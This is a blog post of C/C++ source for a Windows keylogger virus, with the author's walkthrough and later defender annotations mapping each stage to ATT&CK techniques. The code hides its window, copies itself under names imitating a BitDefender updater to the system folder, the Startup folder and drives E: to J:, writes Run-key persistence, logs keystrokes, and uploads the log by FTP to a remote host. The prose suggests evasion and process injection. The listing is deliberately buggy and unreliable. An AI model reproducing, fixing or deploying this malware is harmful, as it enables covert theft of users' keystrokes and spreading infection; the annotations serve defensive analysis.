Monday, May 28, 2018

C programming - Virus writing code

/*
FIRST VERSION 

Please learn C (not 16-bit) and Windows C++ before reading on. Get the Win help file for reference.
The first function is the key logger part (payload), which simply logs keystrokes:
Getkeypress(Int Keypress)
Getasynckeypressstate: this call gets the state of each key; the key's int ASCII value is passed to our function, converted to a string, and saved in a file at C:\Sas.Txt
/*This Is Not A Good Method For Making The Key Kolggers But Preferably The First And Easy Option.Piping Out The Key Strokes Using The Key Bord Hooks Are The Best Method For Doing It(Google For It)

what it does
1)geting the handle to the windows created using hwnd
findwindowa("consolewindowclass",null);
2)registry entry valuse hkey
*********then the hide handle to hide the virus******************
3)using the handle obtained in "hide" we ill set it to be hiden so that itwill run in the back ground bt nt visible
getmodulefilename(getmodh,locate,sizeof(locate));
4)used to get the current path handle for moving it from current position to another
5)getmodulefilename
used to get the current system directory it differs on the insatllation of windows on diff drives
*********victims system file location***************
6)once after getting the system directory ex:c:\windows\system32
7)i append the path of virus copy c:\windows\system32 + bitdefenderupdates.exe using string cat function
8)now copy from current excuted path to new place using copyfile(locate,temprot,false);
copyfile(locate,"c:\\documents and settings\\all users\\start menu\\programs\\startup\\bitdefender_update.exe",false);
************breath of the virus*******************
9)setting it to get autoloaded ever time windows starts,we simply appendfewlines to the registry
10)it sends you the log keystrokes via mail usint ftp() function
we write two star up entryone a link to the current module and one to a fixed path so to evade from common anti virus detection
regsetvalueex(fixstup,"bit defender updates ",0,re_sz,(lpbyte)system2,sizeof(system2));
its ready
****************the wings and leg of virus*******************
am not including those part as its simple jsut write a text file with autorun entries to the removable drives and hence it ill be able to spread
and its ready

*****************************OTHER TECHNIQUES AND Improvements***********************
Just By Ading Few More Codes You Could Make It Un Detactable By Process Vivers And Task Managers
Just By Doing Few Researchs You Could Make It Un Detactable By Anti Virus
Insted Of The Direct Startup Entry Use A Parasitic Infection Technique To Get Auto Started
This Dont Check Whether A Removable Media Exsist Add A Function To Chek The Presence And Then Append The Virusu May Use Shchangenotifyregister To Get Notified Of Any New Drives
U Could All Make It As A Dll And Make Code It To Inject Inot Other Running Process For That Allu Neeed To Do Is To Get The List Of Process On Statup Create A Remote Thread And Inject It To The Stup Applications Virtual Memmory
Just Copy Paste And Compile Wont Work For For These Codes As I Have Added Lots Of Bugs In It.If You Really Wanna Make A Virus You May Try To Investigate And Correct Those Errors Else Leave It.I Don Encourage Script Kiddies
Ill Work Fine And Tested On Vc++,Blood Shed,And Boroland Cs


HAPPY HACKING
*\
#include <windows.h>
#include <Winuser.h>
#include <string>
#include <wininet.h>
#include <fstream.h>

// Getkeypress: payload helper that maps one key code to the text recorded in
// the keystroke log (ATT&CK T1056.001, Input Capture: Keylogging).
//
// keypress - integer key code supplied by the polling loop in main().
// returns  - the string built for that key; empty when no branch matches.
//
// NOTE(review): the page's author states the listing was published with
// deliberate errors. It is annotated here as-is for analysis, not corrected.
//
// Defender view: the bracketed labels below ("[TABULATOR]", "[SNAPSHOT]",
// "[NUMLOCK]", ...) are static strings that would sit next to each other in a
// built binary, so they are usable as string-matching content for this listing.
string Getkeypress(int keypress)
{
string tempkeypress = "";

// Control, navigation and lock keys are recorded as bracketed labels;
// Enter and Space are recorded as a newline and a blank.
if (keypress == 8)
tempkeypress = "[delete]";
else if (keypress == 13)
tempkeypress = "\n"
else if (keypress == 32)
tempeypress = " "
else if (keypress == VK_PAUSE)
tempkeypress = "[PAUSE]";
else if (keypress == VK_CAPITAL)
tempkeypress = "[CAPITAL]";
else if (keypress == VK_SHIFT)
tempkeypress = "[SHIFT]";
else if (keypress == VK_TAB)
tempkeypress = "[TABULATOR]";
else if (keypress == VK_CONTROL)
tempkeypress = "[CTRL]";
else if (keypress == VK_ESCAPE)
tempkeypress = "[ESCAPE]";
else if (keypress == VK_END)
tempkeypress = "[END]";
else if (keypress == VK_HOME)
tempkeyress = "[HOME]";
else if (keypress == VK_LEFT)
tempkeypress = "[left]";
else if (keypress == VK_RIGHT)
tempkeypress = "[right]";
else if (keypress == VK_UP)
tempkeypress = "[UP]";
else if (keypress == VK_DOWN)
tempkeypress = "[DOWN]";
else if (keypress == VK_SNAPSHOT)
tempkeypress = "[SNAPSHOT]";
else if (keypress == VK_NUMLOCK)
tempkeypress = "[NUMLOCK]";
else if (keypress == 190 || keypress == 110)
tempkeypress = ".";
// Codes 96-105 and 48-59 are handled as digit keys.
else if (keypress >=96 && keypress <= 105)
tempkypress = keypress-48;
else if (keypress > 47 && keypress < 60)
tempkeypress = keypress;
if (keypress != VK_LBUTTON || keypress != VK_RBUTTON)
{
// Codes 65-90 are the letter keys; the caps-lock state selects the case.
if (keypress > 64 && keypress < 91)
{
if (GetkeypressState(VK_CAPITAL))
tempkeypress = keypress;
// Author's note: check the log file size to trigger the FTP file transfer.
// Defender view: the log path used here (c://sas.txt) is a file-path
// indicator taken from this listing; a small text file in the drive root
// that grows while the user types is the observable side effect.
if ((fp = open("c://sas.txt", O_RDONLY)) != -1)
fsize = filelength(fp);
if(fsize> 1000);//trigger the FTP file transfer when the file reaches a size specified in bytes
//1MB = 1048576 bytes
int ftp();
else
{
keypress = keypress + 32;
tempkeypress = keypress;
}
}
}

return tempkeypress;
}

// ftp: exfiltration step. Opens a WinINet session and puts the keystroke log
// on a remote FTP server as "log.txt" (ATT&CK T1048.003, Exfiltration Over
// Unencrypted Non-C2 Protocol).
//
// returns - 0 when the session cannot be opened or the upload fails, else 1.
//
// Defender view: everything identifying here is a hard-coded string in the
// binary: the agent string "LOG UPLOAD", the host "ftp.myftp.com", port 21 and
// the credential pair (presumably placeholders; the values are the page's own).
// FTP carries credentials and payload in clear text, so egress filtering of
// TCP/21 from workstations and network inspection both apply.
int ftp()
{
    HINTERNET ftp=InternetOpen(TEXT("LOG UPLOAD"),INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
    if(!ftp)
        return 0;
    else
    {
        // Connect with the FTP service type; host, port and login are literals.
        HINTERNET ftplogin=InternetConnect(Open,"ftp.myftp.com",21,
                      "usname","pwd",INTERNET_SERVICE_FTP,0,0);
        BOOL log = FtpPutFile(ftplogin,loger,"log.txt",FTP_TRANSFER_TYPE_BINARY,0);//author's note: a date-based remote file name could be used to avoid overwriting
            if (log==FALSE)
            {
        InternetCloseHandle(ftp);
        InternetCloseHandle(ftplogin);
                       return 0;
            }
            return 1;
       
    }
}
// main: installer plus capture loop. In order, the visible code hides its own
// console window, copies the running executable to several fixed locations,
// writes two autostart values, then polls key state forever and appends the
// result to a log file.
//
// NOTE(review): the page's author states the listing was published with
// deliberate errors. It is annotated here as-is for analysis, not corrected.
//
// Defender view: ATT&CK techniques visible in this function.
//   T1564.003  Hidden Window             - console window shown with flag 0
//   T1036.005  Masquerading              - file and value names imitate an
//                                          antivirus updater
//   T1547.001  Run Keys / Startup Folder - Run values plus a Startup-folder copy
//   T1091      Replication Through Removable Media - copies to drive roots
//              E: through J: (presumably removable drives, per the page's header)
//   T1056.001  Keylogging                - polling loop at the end
// Useful telemetry: executable file creation in the system directory, drive
// roots and the All Users Startup folder by a non-installer process (Sysmon
// Event ID 11), and value writes under ...\CurrentVersion\Run (Sysmon Event ID 13).
int main()
{

HWND hide;
long fsize;
char system[TOT_SIZ],system2[TOT_SIZ];
HKEY stup,fixstup;
TCHAR SIZ[TOT_SIZ];
LPVOID tempbuffer = NULL;
char temprot[TOT_SIZ];
BOOL buffera = TRUE, filesus = FALSE;
DWORD HANDLE fupldhandle = NULL;
TCHAR loger = TEXT("c\\sas.txt");
TCHAR FIXSTUPPATH[TOT_SIZ+12]="\\BitDefender Updates.exe";
DWORD fread = 0, favail = 0;
char LOCATE[TOT_SIZ];/*creating hide */
// Stage 1: allocate a console, look it up by window class, and hide it.
AllocConsole();
hide=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(hide,0);
// Stage 2: record the path of the running executable and the system directory.
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,LOCATE,sizeof(LOCATE));
GetModuleFileName(NULL,SIZ,TOT_SIZ);
GetSystemDirectory(system,sizeof(system));
GetSystemDirectory(system2,sizeof(system2));
//WRT 2SYS DRV AL PSBL DRV ONS
//temprot[0]=system[0];
//std::strcat(temprot,":\\Program Files\\BitDefender\\BitDefender Updates.exe");
// Stage 3: build the drop paths. Both file names imitate a security product;
// a file with these names in the system directory that is not signed by that
// vendor is the masquerading indicator.
std::strcat(system,"\\BitDefenderUpdates.exe");
//std::strcat(system2,"\\drveprotect.exe");
std::strcat(system2,FIXSTUPPATH);
// Stage 4: self-copy to the system directory, to the roots of drives E: to J:,
// to the All Users Startup folder and to C:\SAS. Each destination literal is a
// file-path indicator taken from this listing.
CopyFile(LOCATE,temprot,false);
CopyFile(LOCATE,system,false);
CopyFile(LOCATE,system2,false);
CopyFile(LOCATE,"E:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"F:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"G:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"H:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"I:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"J:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\BITDEFENDER_UPDATE.exe",false);
CopyFile(LOCATE,"C:\\SAS\\BITDEFENDER_UPDATE.exe",false);
std::string Filename = "C:\\SAS.txt";
// Stage 5: persistence. Two values are written under the machine-wide
// Software\Microsoft\Windows\CurrentVersion\Run key: one pointing at the fixed
// drop path (system2) and one at the current module path (SIZ). The value
// names "BIT DEFENDER UPDATES " (trailing space) and "BIT DEFENDER UPDATES"
// are registry indicators taken from this listing.
/*srt up*/
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",

&stup);
//st fix
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",

&fixstup);
//ste fst
RegSetValueEx(fixstup,
"BIT DEFENDER UPDATES ",
0,

RE_SZ,
(LPBYTE)system2,
sizeof(system2));
//stup fixed
RegSetValueEx(stup,
"BIT DEFENDER UPDATES",
0,
REG_SZ,
(LPBYTE)SIZ,
sizeof(SIZ));


/* Close the keypress. */
RegClosekeypress(stup);
RegClosekeypress(fixstup);
std::string TempString =
Fstream FStream;
FStream.pen(Filename., std::fstream::out | std::fstream:);
//FStream.write(
// Stage 6: capture loop. Every 3 ms it walks key codes 8 to 190, asks for the
// state of each one, and appends the Getkeypress() text to the log, closing
// and reopening the file in append mode after every write.
// Defender view: a process that never exits, queries the state of the whole
// key range at this rate and reopens the same small file after every key is a
// behavioural pattern endpoint products can alert on.
while(1==1)
{

Sleep(3);

for(int i = 8; i < 191; i++)
{
if(GetAsynckeypressState(i)&1 ==1)
{
TempString = Getkeypress (i);

FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}
